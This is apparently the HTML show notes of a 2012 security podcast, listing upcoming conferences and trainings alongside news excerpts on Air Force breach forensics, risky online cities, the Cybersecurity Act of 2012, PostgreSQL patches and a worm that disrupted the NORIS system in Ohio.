	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=688"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=688</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When a hacker manages to penetrate Air Force computer networks, it generally takes experts more than a month to piece together what went wrong.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A forensics investigation into a network breach lasts an average of 45 days, said Arthur L. Wachdorf, senior advisor for intelligence and cyber-operations for the 24th Air Force, the organization that operates and defends the service&rsquo;s networks.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;That&rsquo;s way better than we used to be, but that&rsquo;s not tactically acceptable,&rdquo; he told an AFCEA information technology conference in Tysons Corner, Va.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Air Force needs hardware and software that leaves no back doors to the network open, officials said. Currently, if hackers find a hole they can unload &ldquo;truckloads of information&rdquo; without the service even knowing they were even on the network, said Lt. Gen. Marc Rogers, inspector general of the Air Force.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials asked for industry help to improve its ability to watch over the network and detect and respond to unauthorized activity.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We can do some but not enough,&rdquo; Rogers said. &ldquo;All of our cyber-moats and fort walls and locks and doors we build aren&rsquo;t quite good enough.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies looking for business opportunities in this arena should turn to Air Force Space Command.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;That&rsquo;s where we&rsquo;re going to spend our money,&rdquo; said Lt. Gen. William Lord, chief of warfighting integration and chief information officer of the Air Force.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.symantec.com/about/news/release/article.jsp?prid=20120215_01"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.symantec.com/about/news/release/article.jsp?prid=20120215_01</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Norton teamed up with independent research firm Sperling&rsquo;s BestPlaces to uncover the nation&rsquo;s top 10 cities that have the highest number of cybercrime risk factors.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year marks the second time Norton and Sperling&rsquo;s BestPlaces have collaborated to highlight the various factors that contribute to potential risk.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Top 10 Riskiest Online Cities in the U.S. are:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#1 &ndash; Washington, D.C.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#2 &ndash; Seattle</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#3 &ndash; San Francisco</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#4 &ndash; Atlanta</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#5 &ndash; Boston</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#6 &ndash; Denver</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#7 &ndash; Minneapolis</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#8 &ndash; Sacramento, Calif.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#9 &ndash; Raleigh, N.C.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">#10 &ndash; Austin, Texas</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cities with the greatest risk factors do not necessarily correlate with the highest infection rates, reflecting the fact that many consumers are taking precautions to keep themselves safe.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.forbes.com/sites/jodywestby/2012/02/27/cyber-legislation-will-cost-businesses-and-hurt-economy/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.forbes.com/sites/jodywestby/2012/02/27/cyber-legislation-will-cost-businesses-and-hurt-economy/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Most businesses have paid little attention to the sweeping cybersecurity legislation introduced on Valentine&rsquo;s Day by Senators Lieberman, Collins, Rockefeller, and Feinstein, even though it could be one of the most expensive and intrusive pieces of legislation proposed since Sarbanes-Oxley. &nbsp;Intended to help protect the nation against a major cyber attack by improving the security and resiliency of the computer systems of critical infrastructure companies, the</span><a href="http://thomas.loc.gov/cgi-bin/query/z?c112:S.2105:"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cybersecurity Act of 2012</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (S. 2105) actually would put a federal agent inside most of these businesses&rsquo; data centers and require assessments and reporting that could make Sarbanes-Oxley seem inexpensive.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since 1998, the number of critical infrastructure sectors, now designated by</span><a href="http://www.dhs.gov/files/programs/gc_1189168948944.shtm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Homeland Security Presidential Directive-7</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, has grown from six to eighteen, encompassing a huge number of U.S. businesses. &nbsp;Each designated sector is aligned with a federal agency (referred to as a</span><a href="http://www.dhs.gov/xabout/structure/gc_1189775491423.shtm"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sector-Specific Agency</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">) that is tasked with identifying key risks and vulnerabilities associated with systems and assets within the sector. For example, the banking and financial sector is assigned to the Treasury Department, electricity grids are assigned to the Energy Department, and transportation systems are assigned to the Department of Transportation and Coast Guard. &nbsp;This coupled and stove-piped approach has not been emulated globally because it is not sustainable and, for the most part, cyber attacks are not sector-specific &ndash; they involve civilians and rapidly spread across sectors.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.h-online.com/security/news/item/PostgreSQL-updates-close-security-holes-1444327.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.h-online.com/security/news/item/PostgreSQL-updates-close-security-holes-1444327.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The</span><a href="http://www.postgresql.org/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PostgreSQL</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> development team has published updates for all actively supported branches of its open source relational database to fix bugs and close security holes found in the previous releases.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Versions 9.1.3, 9.0.7, 8.4.11 and 8.3.18 correct a problem that prevented permission checks from being performed and a bug that may result in the successful verification of a spoofed SSL certificate. An input sanitisation error that could be used to execute code when loading a pg_dump file has also been fixed.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These vulnerabilities could be exploited by an attacker to bypass some security restrictions or conduct spoofing attacks and manipulate data. Versions up to and including 9.1.2, 9.0.6, 8.4.10 and 8.3.17 are affected; all users are advised to upgrade.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Further information about the updates, including a full list of fixes and changes, can be found in the</span><a href="http://www.postgresql.org/docs/9.1/static/release-9-1-3.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">9.1.3</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.postgresql.org/docs/9.0/static/release-9-0-7.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">9.0.7</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,</span><a href="http://www.postgresql.org/docs/8.4/static/release-8-4-11.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">8.4.11</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://www.postgresql.org/docs/8.3/static/release-8-3-18.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">8.3.18</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> release notes. The new versions of PostgreSQL are available to</span><a href="http://www.postgresql.org/download/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">download</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> from the project&#39;s site.</span><a href="http://www.postgresql.org/ftp/source/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Source code</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for PostgreSQL is made available under the terms of the</span><a href="http://www.postgresql.org/about/licence/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">PostgreSQL License</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, described as &quot;a liberal open source licence, similar to the BSD or MIT licences&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wtol.com/story/17011513/noris-computer-system-shut-down-over-virus"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wtol.com/story/17011513/noris-computer-system-shut-down-over-virus</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A critical computer network is down after falling victim to a sophisticated worm. Friday, that system is down for the third day, impacting about 200 different agencies, including police departments, jails and courts all over northwest Ohio.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A computer worm infected the Northwest Ohio Regional Information System this week, causing a shutdown of the system Wednesday. It is still unclear what caused the problem, but system administrators believe it was unlikely from hacking.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Toledo Police Department uses the system to check for warrants, criminal histories, mug shots and other records on their laptops while patrolling.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The TPD said they do have other systems to use for accessing records while experts from NORIS work around the clock to fix the problem, but it is slowing down their work.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We&#39;re unable to run records, checks license plates and other things of that nature through NORIS. We have other means of doing it, but this clearly is slowing us down,&quot; explained Sgt. Kelly Thibert of the Oregon Police Department.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Toledo Municipal Court has a fully computerized record-keeping system, but is having trouble without case numbers. In fact, three dozen workers stayed home Friday. Court proceedings did go on as planned Friday with information recorded by hand, but it will all need to be entered into the system once the problem is resolved.</span><br />
